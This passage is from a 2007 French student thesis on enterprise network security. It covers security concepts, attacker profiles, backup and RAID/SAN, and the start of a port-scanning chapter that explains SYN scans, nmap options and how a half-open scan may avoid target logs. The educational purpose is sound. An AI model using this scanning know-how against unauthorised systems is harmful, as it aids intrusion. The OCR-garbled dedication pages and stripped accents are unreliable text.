Sécurité Des Réseaux D'entreprises

ADDA Mohamed
DJEBARI Merouane
LARBI
GASMI
KOUNINEF
MAMAR
NIAR
HACHEMANI Rabah
JUIN 2007
)cnc.icncn.
)ov. cnc.ion. ôn.icv ). 1/(11^/)1, noc
onocv, vc .v vi.oniiic, .v cnco.ic o{c..ionncc c .c.
c.icv_ .on.ci..
^c.i v ov. .cv_ qvi, v vn noncn ov vn vvc, nov.
on voc cv .v.oi {vic, cn vi.vic :
I/O+I I]ivi, ). /v c..vncv, O+Z1))1I/
ônvncv, O+I1 )/Ô+ v]vnc, )c.in.
)ov. cnc.ion. no. vni. v11 2
)ov. cnc.ion. cvcncn c. ncnc. vv ]v, vv.oi
v..cc vc ]vc noc v.vi.
)o. cnc.icncn. .on cvcncn v ov. c. cn.cinvn.
vc 1IO.
ônvncv /II/

^vovvnc I}1/)1
Icvi.v.c.
/v non v/vn c î.ci.ovicv_ c . ni.ci.ovicv_.
}vi inncn.c nonncv vc vcvic .c ncnoic :
/ nc. . .nc. vcn. qvi cvicn c.cn. ov noi vvvn ovc nv .ic.
/ nc. {c. ^cnvi, v.inc c ônvncv qvc ]vinc vn.
/ ovc nv vnvc {vnic
/ non .ov.in ,c. c .on .ovicn vvvn non .v.v. vc. cvvc. .vcicv..
/ nv .ov.inc ^cicn c .c. .on.ci. vc .vc..c.
/ ov. nc. vni. vc 1IO
/ nc. .ovin. vc ô.vvncn, (ni{ c .v cic {vnic, vi{v c .v {vnic,
)nvivv c .v {vncic, )nic 1vvinc, )vviv, /v c )vvc c 1i.nvn.
/ cv vv )ovivc
/ nv vc{vnc vnc, cv nvnvn, qvi nv .ovcnv cnvvn .c. oi. vcnic.
vnncc., c qvi cvi .i cnccv.c v.c. noi
ôn Iicv cnic nv vnc.
^covvnc I}1/)1
Icvi.v.c.
/ nv vnvc c .nc {vnic,
/ nv ^c c v non Tc, ^c. .nc. Tvcn. v qvi ]c voi. ov,
/ nc. ov. /[iv, /v..iv c /ninv,
/ nc. Ic., /v 1 /:i:, vnin c /v 1 ^vv]iv,
/v_ ^vi. vc nc. ov., )ov 1vvinc c ônvncv,
/ cv. cn{vn. ônvncv /v 1 1vvi, v.inc /nncv c /,v, qv/vn c.
vvc c c. c.c.c,
-
/ nv Icnnc qvi nv .ovcnv ov vv on vc non v.ov. c v v {vnic
)ovivn qvi nc. . .nc,
/ ov. c. ncnc. vc v {vnic I]cvi qvc ]vinc cvv.ov c v qvi ]vvc..c

ov. nc. c.c..,
/ ov. .cv_ qvi nc .on .nc..
ônvncv /II/
IGE : 27 Scurit des rseaux dentreprise
Sommaire
lntroduction qnro/e...................................................................................................................................................6
Chapitre1 : ....................................................................................................................................................................8
Etude gnrale de la scurit des rseaux...................................................................................................................8
1- INTRODUCTION...........................................................................................................................................8
2- La scurit, cest quoi ?...................................................................................................................................8
3- Les composantes de la scurit informatiques :............................................................................................8
Lidentification (identity) ....................................................................................................................................8
Lauthentification (authentication)......................................................................................................................8
La confidentialit (privacy) .................................................................................................................................8
Lintgrit des donnes (MAC, Message AuthentiCation) .................................................................................
La nnn-rpudiatinn............................................................................................................................................
4- Scurit des Applications Distribues............................................................................................................
Scurit et Rseau....................................................................................................................................................
5- Qui sont nos ennemies ?..................................................................................................................................
Profils des attaquants..........................................................................................................................................
Les principaux objectifs d'un attaquant sont de cinq ordres :...................................................................... o
6- Comment se manifeste une attaque ............................................................................................................. o
7- La politique de scurit................................................................................................................................. z
8- Scurit des donnes...................................................................................................................................... z
1 La technologie RAID ...................................................................................................................................... _
2 Les SAN..........................................................................................................................................................
9- CONCLUSION...............................................................................................................................................
Chupltre2 . ................................................................................................................................................................. 6
Diffrents types dattaques et solutions................................................................................................................. 6
Introduction :......................................................................................................................................................... 6
LES SCANNEURS DE PORTS........................................................................................................................... 6
1 Dfinition :.................................................................................................................................................... 6
2 - Les scans des ports TCP:............................................................................................................................. 6
3 - Scan de ports UDP .......................................................................................................................................
4 - Comment se protger contre les diffrents types de scan.........................................................................
LES ANALYSEURS .............................................................................................................................................zo
1 Dfinition :....................................................................................................................................................zo
2 - Types danalyseurs : ....................................................................................................................................zo
3 - Winpcap : .......................................................................................................................................................zo
LES PRINCIPALES ATTAQUES ...................................................................................................................... z
1 - Les attaques sur rseau : ............................................................................................................................. z
2 - Le dni de service :....................................................................................................................................... z_
3 - Les attaques applicatives :........................................................................................................................... z_
4 - Man in the middle ........................................................................................................................................z
5 - RSEAU SANS FIL.....................................................................................................................................z

6 - Virus et Trojan:............................................................................................................................................ z
LES FIREWALLS ou PAREFEUX ....................................................................................................................z6
1 - Pourquoi un firewall :..................................................................................................................................z6
2 - Les diffrents types de filtrages : ................................................................................................................z6
3 - Les diffrents types de firewall : .................................................................................................................z8
LES SYSTEMES DE DETECTION DINTRUSION: IDS...............................................................................z
1 - Dfinition : ....................................................................................................................................................z
2 - Types dIDS :................................................................................................................................................z
3 Les systmes de prvention dintrusions (IPS) : ......................................................................................_o
4 Les mthodes de dtection .......................................................................................................................... _
Conclusion :............................................................................................................................................................ __
Chupltre3 . ................................................................................................................................................................._
Exprimentations...................................................................................................................................................._
Introduction :........................................................................................................................................................._
Exprimentation 1 :..............................................................................................................................................._
A la recherche du mot de passe dune boite e-mail :......................................................................................_
Exprimentation 2:................................................................................................................................................_8
Hack complet dun serveur : ............................................................................................................................_8
Conclusion : ..........................................................................................................................................................
Chupltre4 . .................................................................................................................................................................
Applications ............................................................................................................................................................
Application 1 : social engineering ........................................................................................................................
Dfinition : .........................................................................................................................................................
Mise en uvre :..................................................................................................................................................
Application 2 : Scanner de ports..........................................................................................................................6
DIinitinn d'unc 5nckct : ...............................................................................................................................6
Application 3 : ralisation dun analyseur sous DELFI : ........................................................................................8
conc/usion qnro/e....................................................................................................................................................o
GLOSSAIRE :..............................................................................................................................................................
6
Introduction gnrale
Internet offre des possibilits la fois riches et nouvelles pour la croissance et le dveloppement
commercial. Grce la diversit des services et des solutions dsormais disponibles sur le rseau, les
socits sont mieux mme de prendre soin de leur clientle, de gnrer des synergies entre des employs
gographiquement loigns et de se crer des opportunits de nouveaux revenus par laccs une base de
clients plus large et plus diversifie.
Mais si Internet a transform et nettement amlior les transactions commerciales, ce vaste rseau et les
technologies qui lui correspondent ont ouvert la porte un nombre croissant de menaces relatives la
scurit contre lesquelles les entreprises doivent se prmunir. Bien que les attaques des rseaux soient
gnralement plus graves lorsquelles visent des socits qui stockent des donnes critiques, comme des
dossiers confidentiels mdicaux ou financiers, les consquences de ces attaques sur une entreprise peuvent
aller dun lger dsagrment une paralysie complte de lactivit, des donnes importantes peuvent tre
perdues, la confidentialit peut tre transgresse et plusieurs heures ou jours dinterruption du rseau
peuvent sen suivre.
Maintenant, plus que jamais, il est impratif que les entreprises intgrent la scurit au sein de
larchitecture de leur rseau afin de limiter ces risques et de concrtiser le potentiel de croissance inhrent
lenvironnement de rseau.
Les menaces sur la confidentialit et lintgrit des donnes proviennent dun trs petit nombre de
vandales. Cependant, alors quun voleur de voiture ne peut voler quun seul vhicule la fois, un seul
pirate peut, partir dun simple ordinateur, engendrer des dgts sur un grand nombre de rseaux
informatiques, faisant des ravages dans le monde entier. Le fait le plus inquitant est peut-tre que le
danger peut provenir de personnes que nous connaissons. En effet, la plupart des experts en scurit des
rseaux dclarent que la majorit des attaques des rseaux sont effectues par des employs travaillant
dans des socits comportant des failles dans leur scurit. Les employs peuvent sans difficult
endommager les rseaux de leur socit et dtruire des donnes, que ce soit par malveillance ou par erreur.
De plus, grce lvolution rcente des technologies de connexion distance, les socits dveloppent de
plus en plus le tltravail, ouvrent plus facilement de nouvelles succursales et augmentent leur rseau de
partenaires commerciaux. Ces employs et partenaires distants reprsentent les mmes dangers que les
employs internes, les risques seront dautant plus levs si leur accs distance au rseau nest ni
scuris ni contrl.
Les pirates attaquent ce quils connaissent. Dans un premier temps, ils se sont intresss linterception
des mots de passe et des login, puis aux serveurs. On entre aujourdhui dans une 3me phase : ils se font
passer pour une application ou un utilisateur pour saboter le systme dinformation. Demain, ils prendront
possession du poste client et procderont de mme pour se glisser partout et attaquer le rseau en tant que
tel. En dautres termes, autrefois, on scurisait la priphrie des systmes dinformation et on tait labri.
Aujourdhui ce nest plus suffisant, le poste client et les serveurs sont au cur des problmatiques
actuelles de scurit : ils doivent tre protgs. Il faut anticiper les comportements des pirates et laborer
des schmas directeurs et des architectures capables de sadapter en permanence aux nouvelles formes
dattaques. Il faut penser en termes de prvention et non plus de raction. Cest dautant plus primordial
que les attaques ont gagn en rapidit : l o on raisonnait en semaines auparavant, tout se joue dsormais
en quelques heures.
Lobjectif recherch travers la rdaction de ce projet est de permettre au lecteur, familiaris avec les
systmes dinformation et les rseaux, dacqurir un ensemble de connaissances sur la scurit qui lui
permettront de mieux comprendre les divers mcanismes permettant de protger les systmes
dinformation et les rseaux contre les principaux risques de piratage et dintrusion.
;
Ce document contient deux grandes parties:
1
er
partie : Ltude thorique qui englobe deux chapitres :
Chapitre1 : Etude gnrale de la scurit des rseaux : on a parl dans ce chapitre de la scurit des
rseaux dune faon gnral, en quoi consiste la scurit ? Les composant de la scurit des rseaux,
comment ce manifeste une attaque ? Quelle devrait tre la stratgie scuritaire, la scurit des donnes
dans une entreprise.
Chapitre2 : Diffrents types dattaques et solutions : on a prcis les risques qui engendrent un rseau
informatique et les outils utiliss soit par un attaquant ou par un administrateur rseau (scanner, sniffer,
IDS, firewalls )
2
eme
partie : cest ltude pratique qui contient aussi deux chapitres :
Chapitre3 : Ralisation de quelques exprimentations : cest une partie indispensable dans ce mmoire,
car le lecteur remarque bien les dgts que peut faire un attaquant lorsquil pntre dans un rseau (avoir
des mots de passes de boites email, des pc, des serveurs, avoir un privilge administrateur)
Chapitre4 : Applications : cest des petits logiciels (programmes) qui peuvent tre utiles dans un titre
didacticiel.
Chapitre : 1 Etude gnrale de la scurit des rseaux
8
Chapitre1 :
Etude gnrale de la scurit des rseaux
1- INTRODUCTION
Linformatique est devenue aujourdhui un outil indispensable contribuant la communication, la
gestion, la production et lorganisation de lentreprise. Les systmes dinformation mettent en jeu des
donnes importantes propres lentreprise, dont les plus importantes constituent des donnes critiques.
De plus louverture sur Internet tant quasi-indispensable pour la plupart des entreprises il est primordial
de protger ses donnes en mettant en place une stratgie efficace de scurisation du systme
dinformation afin dviter toute intrusion malveillante et les consquences qui en dcoulent.
Mais les systmes informatiques ne sont pas vulnrables quaux attaques extrieures.
Lincendie, lexplosion ou le dgt des eaux, linsouciance, la maladresse ou la malveillance dun
collgue, peuvent perturber gravement le fonctionnement de cet incomparable outil de travail et de
communication. Il faut donc, sauvegarder en un lieu sr et distant les informations et les donnes que
lunit ne peut se permettre de perdre.
2- La scurit, cest quoi ?
Dune faon gnrale la scurit est lensemble des mesures permettant dassurer la protection des biens
/valeurs.
Dans le monde informatique, on distingue deux types de biens savoir :
- Linformation, les donnes (comme : les offres, les commandes, les contrats, les donnes clientles,
les donnes stratgiques)
- Les systmes permettant de traiter, vhiculer et stocker linformation (les applications, les
serveurs, les stations de travail, les bases de donnes, les rseaux internes et externes)
3- Les composantes de la scurit informatiques :
Classiquement la scurit sappuie sur cinq concepts de base :
Lidentification (identity)
Lutilisateur dun systme ou de ressources diverses possde une identit (une sorte de cl primaire
dune base de donnes) qui dtermine ses lettres de crdits (credential) et ses autorisations dusage. Cette
dernire peut tre dcline de multiples manires, compte utilisateur (login) dun systme dexploitation
ou techniques biomtriques empreinte digitale, empreinte vocale, schma rtinien
Lauthentification (authentication)
Cette opration consiste faire la preuve de son identit. Par exemple on peut utiliser un mot de
passe, ou une mthode de dfi base sur une fonction cryptographique et un secret partag.
Lauthentification est simple ou mutuelle selon les contraintes de lenvironnement.
La confidentialit (privacy)
Cest la garantie que les donnes changes ne sont comprhensibles que pour les deux entits qui
partagent un mme secret souvent appel association de scurit (SA). Cette proprit implique la mise en
uvre dalgorithmes de chiffrements (rfrence [RL1]) soit en mode flux (octet par octet, comme par
exemple dans RC4) soit en mode bloc (par exemple par srie de 8 octets dans le cas du DES).
Lintgrit des donnes (MAC, Message AuthentiCation)

Le chiffrement vite les coutes indiscrtes, mais il ne protge pas contre la modification des
informations par un intervenant mal intentionn. Des fonctions sens unique (encore dnommes
empreintes) telles que MD5 (16 octets) ou SHA1 (20 octets) ralisent ce service. Le MAC peut tre
associ une cl secrte (HMAC(Message,cl), Keyed-Hashing for Message AuthentiCation)
1
.
La nnn-rpudiatinn
Elle consiste prouver lorigine des donnes. Gnralement cette opration utilise une signature
asymtrique en chiffrant lempreinte du message avec la cl RSA prive de son auteur
(RSA(Empreinte(Message))) (rfrence [RL2]).
On cite parfois un sixime attribut relatif la sret de fonctionnement (disponibilit, rsilience) du
systme. Remarquons galement que la scurit implique le partage de confiance entre les diffrents
acteurs de la chane.
4- Scurit des Applications Distribues
La scurit globale sappuie sur le triptyque :
1) la scurit des applications clientes, 2) la scurit des plateformes informatiques qui excutent ces
applications (Operating System, Hardware), 3) la scurit des protocoles de communication et du rseau
qui transporte ces lments.
Scurit et Rseau
Un rseau assure le transport des messages changs entre deux applications distantes. Dans le modle
OSI les services dploys par le rseau sont classs en sept couches, physique, donnes, rseau, transport,
session, prsentation et application.
Le modle classique des rseaux TCP/IP ne comporte que 5 couches, physique (PMD+PHY), donnes
(MAC+LLC), rseau (IP), transport (UDP+TCP) et applications.
5- Qui sont nos ennemies ?
En rgle gnrale, les dangers proviennent de lextrieur et de lintrieur.
Profils des attaquants
Sans dtailler tous les profils, on retiendra le plus connu ; les hackers qui interviennent
individuellement ou via des organisations. Diffrentes catgories de hackers existent en fonction de leur
champ d'implication (lgal ou illgal) ou de leur impact sur les rseaux informatiques : les chapeaux
blancs, certains consultants en scurit, administrateurs rseaux ou cyber-policiers, ont un sens de
l'thique et de la dontologie.
Les chapeaux gris pntrent les systmes sans y tre autoriss, pour faire la preuve de leur habilet mais
ne connaissant pas la consquence de leurs actes. Les chapeaux noirs, diffuseurs volontaires de virus,
cyber-espions, cyber-terroristes et cyber-escrocs, correspondent la dfinition du pirate. Ces catgories
peuvent tre subdivises en fonction des spcialits. Ainsi, le craker, soccupe de casser la protection
des logiciels, le carder, les systmes de protection des cartes puces, le phreaker, les protections des
systmes tlphoniques.
ct de ces profils offensifs, un autre groupe de personnes doit tre pris en considration par les
entreprises, savoir les innocents utilisateurs de loutil informatique. Eux, vous, moi, nous tous par nos
ueLall dans reference [8L]

o
innocentes maladresses, par notre inconscience et notre dsinvolture mettons chaque jour en danger la
confidentialit, lintgrit et la disponibilit des donnes et des systmes informatiques.
Les principaux objectifs d'un attaquant sont de cinq ordres :
dsinformer ;
empcher l'accs une ressource sur le systme dinformation ;
prendre le contrle du systme par exemple pour l'utiliser ultrieurement ;
rcuprer de l'information prsente sur le systme ;
utiliser le systme compromis pour rebondir vers un systme voisin.
Il est toujours difficile de connatre les motivations dun acte, mme si ces dernires telles que le besoin
de reconnaissance, ladmiration, la curiosit, le pouvoir, largent et la vengeance sont le plus souvent
moteur dans des actes dlictueux.
Il est cependant utile de chercher les comprendre pour mettre en place des stratgies et des tactiques de
rponses adaptes.
On distingue traditionnellement 4 types dattaques quils nous semblent utile ici de rappeler un public
non averti :
Ludique : les attaquants sont motivs par la recherche d'une prouesse technique valorisante,
cherchent dmontrer la fragilit d'un systme et se recrutent souvent parmi de jeunes
informaticiens.
Cupide : des groupes ou des individus cherchent obtenir un gain financier important et rapide.
Les victimes dtiennent de l'argent ou ont accs des flux financiers importants (banques, paris en
ligne...). Le chantage est devenu une pratique courante, comme lillustre lexemple des virus
Smitfraud.C et PGP Coder qui demandent explicitement lutilisateur de payer pour rtablir le bon
fonctionnement du systme.
Terroriste : des groupes organiss, voire un Etat, veulent frapper l'opinion par un chantage ou par
une action spectaculaire, amplifie par limpact des mdias, telle que le sabotage dinfrastructures
vitales, mais il fait souligner que cela na encore jamais t rapport.
Stratgique : un tat, des groupes organiss ou des entreprises, peuvent utiliser avec efficacit les
faiblesses ventuelles des systmes d'information afin de prendre connaissance d'informations
sensibles ou confidentielles, notamment en accdant frauduleusement des banques de donnes.
L'attaque massive de systmes vitaux d'un pays ou dune entreprise afin de les neutraliser ou de les
paralyser constitue une autre hypothse. La dsinformation et la dstabilisation sont des moyens
trs puissants et faciles mettre en oeuvre avec un effet multiplicatif d notre dpendance vis--
vis de linformation.
Cette typologie prend en compte la fois les niveaux de comptence et les niveaux de dtermination des
auteurs. Il est noter que les motivations peuvent tre croises et ou combines ; par exemple un intrt
cupide et stratgique.
6- Comment se manifeste une attaque
Du temps o linformatique tait centralise, les menaces physiques (pntration dans des locaux
informatiques sans autorisation, vol, vandalisme) reprsentaient les menaces majeures. En ces temps
bnis, la protection pouvait se rsumer en quelques mesures de contrle daccs : grosses serrures, sas et
gardiens taient la panoplie usuelle. La situation est aujourdhui bien diffrente. Certes, il y a toujours les
vols de matriel, lutilisation de la console matresse pour pntrer un systme ou le pigeage dun rseau
Ethernet ou public pour le mettre sur coute ; mais globalement, la dangerosit de ce type de menaces,
dont les remdes sont connus et prouvs, est sans commune mesure avec les attaques menes par le
rseau, qui se ralisent sans la prsence physique de lattaqueur. Ces attaques par le rseau ont maintenant
trs largement atteint un seuil critique et ont ne sait pas toujours quelle parade leur opposer. Dans le
palmars de cette nouvelle dlinquance, on retrouve ple-mle:
Tout ce qui porte atteinte lintgrit du systme
Le pigeage de systmes (bombes logiques, cheval de Troie, sniffer)
2
afin de nuire
lentreprise ou de se donner les moyens de revenir plus tard.
La modification des informations afin de porter atteinte limage de lentreprise (exemple :
modification des pages web de lentreprise).
Lutilisation des ressources du site vis.
Une intrusion en vue dattaques par rebond, cest--dire quune autre cible est vise, votre
systme servant seulement de point de passage . Lentreprise est alors complice involontaire
du piratage.
Tout ce qui porte atteinte la confidentialit des informations
La rcupration dinformations sensibles (mot de passe, articles avant publications, donnes
personnelles, etc.).
La fouille des messages, des donnes, des rpertoires, des ressources rseaux
Lusurpation didentit_.
Tout ce qui porte atteinte la disponibilit des services
La paralysie du systme (considr ensuite comme un exploit par les pirates qui lont ralise).
La saturation dune ressource (serveur, imprimante).
Les virus et vers informatiques.
Que voyons-nous, quand on tudie les causes des vulnrabilits dans les rseaux dentreprises? Citons
ple-mle, parmi les plus importantes :
Labsence de mthodologie de scurit ;
Labsence de structure de scurit ;
Labsence de plan de secours (ou sil y en a, il na jamais t test) ;
Labsence de formation : Les utilisateurs savent ;
La mconnaissance de la rglementation.
Sattaquer ces causes de vulnrabilit permettrait dviter au moins 80 % des problmes.
Cela signifie :
Mieux organiser, mieux prvoir et mieux sensibiliser.
Appliquer des procdures de gestion des ressources informatiques.
Mettre en place des moyens de protection active.
Avoir une approche mthodologique.
Concevoir une architecture structure et cohrente.
z
SeronL deLallles dans le chaplLre z
_
l spooflng, A8 spooflng. seronL deLallles dans le chaplLre z
Le deLall esL dans le chaplLre z

z
7- La politique de scurit
Dterminer une politique de scurit, cest dfinir des objectifs (ce quil faut protger), des
procdures, une organisation en fonction de moyens. La dmarche est rcursive : aprs un problme de
scurit, la politique est ajuste. Les procdures, les moyens et parfois lorganisation sont adapts. Parfois,
il faut rviser la baisse les objectifs.
Il est important de dfinir correctement les rgles du modle : ce qui est autoris et ce qui ne lest pas (il
est interdit de lire le courrier de son voisin sans y tre invit, mme si celui-ci na pas su le protger
correctement). Il est absurde mais on le voit souvent de vouloir verrouiller les entres, dfinir des
interdictions alors quon na pas su dfinir les rgles auxquelles devraient se rfrer ces actions.
La politique de scurit est labore partir de ce modle :
analyse des menaces potentielles ou relles ;
identification et lanalyse des vulnrabilits (audit, contrle qualit) ;
valuation des risques et la dtermination du niveau de risque admissible.
Elle se ralise par :
lintgration doutils et de services de scurit systme ou rseau (audit, contrle daccs,
identification, logiciel antivirus, systmes experts, noyau de scurit) ;
la validation logiciel/systme (techniques formelles, tests statiques et dynamiques, etc.) ;
lvaluation et la certification des systmes et des produits.
La scurit ne doit pas rester statique car toute dfense peut tre contourne ; cest pourquoi une bonne
politique de scurit comprend toujours deux volets :
1. La scurit a priori (politique dite passive ) : cest le blindage du systme. Elle se caractrise par
llaboration dune politique de scurit explicite, une organisation adapte cette politique, des
procdures des mthodes de travail, des techniques et des outils
2. La scurit a posteriori (politique dite active ) : cest la dfense en profondeur Elle consiste
par exemple :
surveiller les moyens de protection pour contrler leur efficacit (mais aussi lefficacit de la
politique de scurit) ;
dtecter les attaques et les mauvaises configurations en enregistrant les accs aux services
sensibles, en mettant en place des automatismes de dtection dintrusion, etc. ;
rpondre par des actions correctives : arrt de session, reconfiguration dynamique des systmes
de contrle daccs, enregistrement des sessions ;
mettre en place des leurres.
Ici, il est convenu dappeler attaquant toute personne physique ou morale (Etat, organisation, service,
groupe de pense, etc.) portant atteinte ou cherchant porter atteinte un systme dinformation, de faon
dlibre et quelles que soient ses motivations.
8- Scurit des donnes
La sauvegarde en entreprise est un lment essentiel et mme vital a celle-ci et pourtant ne fait pas
l'objet d'assez d'attention dans beaucoup de cas. Nul n'est l'abri d'une mauvaise manipulation, ou plus
gravement d'un crash informatique provocant la perte intgrale des donnes accumules par l'entreprise.
Ceci affecte srieusement le fonctionnement mme de l'entreprise qui prend du temps se relever d'un tel
incident ou qui dans le pire des cas doit fermer ses portes. Il est donc primordial d'tablir une solution de
sauvegarde afin de garantir la prennit de l'information et d'assurer la continuit des activits d'une
entreprise.
_
Certaines questions doivent se poser afin de choisir un plan de sauvegarde :
volume des donnes sauvegarder
type des donnes sauvegarder
frquence laquelle les donnes doivent tre sauvegarder
priode de temps admis pour la sauvegarde
dure admise pour la restauration dune sauvegarde
qualit de la sauvegarde
dure pendant laquelle les donnes doivent tre sauvegardes
dure de vie des sauvegardes
environnement ( quel endroit seront effectues les sauvegardes)
budget de l'entreprise
Deux principales mthodes de sauvegarde sont utilises en entreprise : les systmes RAID et les SAN.
1 La technologie RAID
Le systme RAID (Redundant Array Independant Disk) est une mthode professionnelle et fiable
de sauvegarde de donnes. Le principe est de crer un espace de stockage partir de plusieurs units de
disques. Lutilisation dun tel systme offre une tolrance de panne selon les niveaux de RAID utiliss,
une plus grande rapidit de lecture/criture, et une totale transparence pour lutilisateur finale.
Il existe plusieurs niveaux de RAID utilisant des techniques diffrentes de sauvegarde dont les principaux
sont :
Niveau 0: striping, Niveau 1: mirroring, Niveau 3: stripping avec parit, Niveau 5: stripping avec parit
rpartie
RAID 0 Stripping
Les donnes sont rparties de faon quitable sur plusieurs disques. Il ny a pas de systme de
parit et donc cette mthode ne constitue pas une tolrance de panne. Si un disque meurt toutes les
donnes seront perdues. Cependant comme la totalit de linformation est rpartie proportionnellement sur
lensemble des disques chaque disque naura quune partie de linformation crire ce qui acclre les
traitements lecture/criture.
RAID 1 - Mirroring
Ici lintgralit des informations dun disque est recopie lidentique sur un deuxime disque. Si
un disque a une dfaillance on peut le remplacer par lautre.
RAID 3 Stripping avec parit
Cest le mme principe que le RAID 0 mai avec un disque de parit (donc 3 disques minimum). La
diffrence est qu linverse du RAID 0 si un disque meurt on ne perd pas les informations. En effet grce
au disque de parit il sera possible de reconstruire linformation. Le disque de parit doit tre de bonne
qualit et il faut vrifier son tat car si il tombe en panne il ne sera plus possible de reconstruire les
donnes.
RAID 5 Stripping avec parit rpartie
Cest le mme principe que le RAID 3 mais avec une parit rpartie circulairement sur lensemble
des disques. Cest lun des plus utilis en entreprise car plus fiable.
La mise en place dun RAID peut se faire soit de faon logicielle (logiciel permettant de crer un seul
volume avec plusieurs disques), soit matrielle (unit externe fonctionnant indpendamment de
lordinateur et gre lui seul le RAID).
2 Les SAN
Le SAN (Storage Area Network) est une solution de sauvegarde s'adressant plutt au grosses
socits car trop coteux pour une PME. Le SAN comme son nom l'indique est un rseau de stockage
indpendant du rseau de l'entreprise proprement dit. Ici la notion de rseau ne dsigne pas un rseau IP
mais un rseau physique tel que des connexions fibre optique par exemple. Concrtement il est constitu
par un ensemble de priphriques de stockages (disque durs) regroups dans une baie (armoire de
stockage) et relis entres eux par des connexions SCSI (Small Computer System Interface), SSA (Serial Storage
Architecture), Fiber Channel (fibre optique) ou ESCON (Enterprise System Connection) garantissant ainsi un accs
rapide aux donnes et de faire face de grosses demandes d'informations simultanes. Ce sont des
systmes de haute disponibilit avec des redondances matrielles (alimentation, contrleur, ventilateur) et
un systme Hot-Plug permettant l'ajout ou l'change de matriel chaud. Le rseau SAN possde ses
propres quipements d'interconnexion tels que les ponts, switches fiber channel. Du fait de son
indpendance il allge le trafic sur le rseau principal de l'entreprise. Le SAN peut tre tendu souhait en
rajoutant des priphriques de stockages (disques durs) en rseau augmentant ainsi la capacit de
stockage. Il peut ainsi contenir des centaines de disques durs et atteindre des traoctets de stockage.
Cependant il existe des SAN fonctionnant avec des bandes magntiques, on parle alors de librairies de
sauvegarde (au lieu de baie de disques). L'accs au SAN par les ordinateurs se fait via une interface
spcifique FC (Fiber Channel) en plus de l'interface rseau habituelle. (figure 1)
Figure 1
9- CONCLUSION
La scurit dpend de tous, et tous les facteurs interagissent entre eux. La qualit des hommes
comptence, motivation, formation est importante ; il faut y porter un effort constant. Les techniques et
les moyens financiers sont vitaux et ne doivent pas tre ngligs. Mais de tous les facteurs et acteurs qui
interviennent dans les rseaux et contribuent la force ou la faiblesse de lensemble, les directeurs
dunit jouent le rle essentiel.
Les systmes informatiques et les rseaux, qui taient nagure loutil dune certaine lite, sont maintenant
au coeur de tous les systmes. Ce dveloppement technique a permis daccrotre considrablement nos
capacits de traitement, de stockage et de transmission de linformation ; mais il a rendu en mme temps
les systmes dinformation beaucoup plus fragiles. La gravit des accidents, des maladresses, des erreurs
ou des malveillances est bien plus grande quauparavant : cest souvent la perte de plusieurs jours, parfois
de plusieurs semaines de travail. Ces pertes peuvent tre mme irrparables. Paralllement, les techniques
et les savoir-faire se sont gnraliss.
Il y a vingt ans, attaquer un systme informatique centralis demandait une certaine technicit quil
nest plus ncessaire de possder aujourdhui. On trouve sur Internet les botes outils toutes prtes
permettant dattaquer nimporte quel site, surtout sil est mal administr.
Chapitre : 2 Diffrents types dattaques et solutions
6
Chupltre2 .
Diffrents types dattaques et solutions
Introduction :
Attaques et menaces, pour toute entreprise un certain degr de risque existe, et selon les besoins
ladministrateur met en place une stratgie, ce quil faut comprendre est que toute attaque obit
gnralement la rgle des cinq P :
Probe : consiste en la collecte dinformations par le biais doutils comme whois, Arin, DNS
lookup, ou par lutilisation de scanner de ports.
Penetrate : utilisation des informations rcoltes pour pntrer un rseau.
Persist : cration dun compte avec des droits de super utilisateur pour pouvoir se r infiltrer
ultrieurement.
Propagate : cette tape consiste observer ce qui est accessible et disponible sur le rseau local.
Paralyze : cette tape peut consister en plusieurs actions. Le pirate peut utiliser le serveur pour
mener une attaque sur une autre machine, dtruire des donnes ou encore endommager le systme
dexploitation dans le but de planter le serveur.
Dans ce chapitre on va essayer de voir la premire tape pour un hacker ou bien pour un administrateur
qui fait laudit, il sagit de la collecte dinformation, on va parler des scanners, et des analyseurs. Ensuite
on entamera quelques techniques dattaque et leur consquence, et en fin comme dernire partie on parlera
de deux technologies dfensives parmi plusieurs autres, on parlera des pare-feux, et des systmes
dtecteurs dintrusions.
LES SCANNEURS DE PORTS
1 Dfinition :
Un scanneur est un programme qui balaye une plage de ports TCP ou UDP (rfrence[RL3]) sur
un ensemble de machines, afin d'tablir la liste des couples machine/services ouverts. Le scan horizontal
consiste scanner un port sur un ensemble de machines, alors que le scan vertical consiste scanner une
plage de ports sur une mme machine.
2 - Les scans des ports TCP:
2.1 - Les scans ouverts:
Ce type de mthode de scan implique l'ouverture d'une connexion complte sur l'ordinateur
distant en utilisant un accord TCP/IP en trois tapes classiques. Voici une technique illustrant un scan
ouvert.
Vanilla connect() :
TCP connect() est la mthode de connexion la plus basique et la plus fiable. L'appel systme connect()
essai d'ouvrir une connexion entre ports sur un host distant. Si le port est ouvert, connect() russira s'y
connecter, sinon le port est dit ferm ou sans rponse.
;
On considre qu'un port est ouvert sur la cible, lorsqu'on obtient ce schma:
1- SYN
2- SYN-ACK
3- ACK
Cible A
Pirate Z
On considre qu'un port est ferm sur la cible, lorsqu'on obtient ce schma :
1- SYN
2- RST-ACK
Cible A
Pirate Z
On peut aussi ne rien recevoir si la cible l'a dcid o si un Firewall plac en avant l'interdit. Un port
ferm peut alors aussi se reprsenter par une non rponse. Voici des outils fonctionnant sur la mthode
Vanilla connect() :
1. Nmap utilise cette mthode si on lui indique l'option -sT.
2. Sous Windows, le SuperScan de Foundstone est un trs bon outil de scanning.
2.2 - Les scans demi-ouverts :
Le scan demi-ouvert est rassemblant au scan ouvert, sauf que dans ce cas lattaquant ferme la
connexion avant la fin des accords en trois tapes. Lexemple suivant explique le principe de ce scan.
Half-open SYN flag
En tant normal, comme vu juste au dessus, la connexion TCP s'effectue en 3 datagrammes. Ici,
nous allons envoyer un SYN, recevoir un SYN/ACK, mais au lieu de renvoyer un ACK, avec la mthode
demi connexion SYN, nous allons envoyer un RST, ce qui va brutalement fermer la connexion. Si la
machine cible n'a pas d'IDS (Systme de Dtection d'Intrusions) ou de firewall, cette demi-connexion
ne sera pas enregistre (dans les logs) par la machine cible. Dans le cas contraire il y aura une trace
comme quoi la connexion a t ferme brutalement et ce n'est donc pas normal.
1- SYN
2- SYN-ACK
3- RST
Cible A
Pirate Z
Si, aprs avoir envoy un SYN, on reoit un SYN/ACK, cela veut dire que le port est ouvert. On renvoie
donc un RST pour couper la connexion, dans l'espoir de ne pas tre logu. Si le port est ferm, on recevra
un RST/ACK et on s'arrte l.
Voici un outil fonctionnant sur la mthode Half-open SYN flag :
Nmap utilise cette mthode si on lui indique l'option -sS.
Comme cette mthode est dsormais dtectable par les IDS et les Firewalls, le scan suivant peut rsoudre
le problme.
8
Inverse TCP flag :
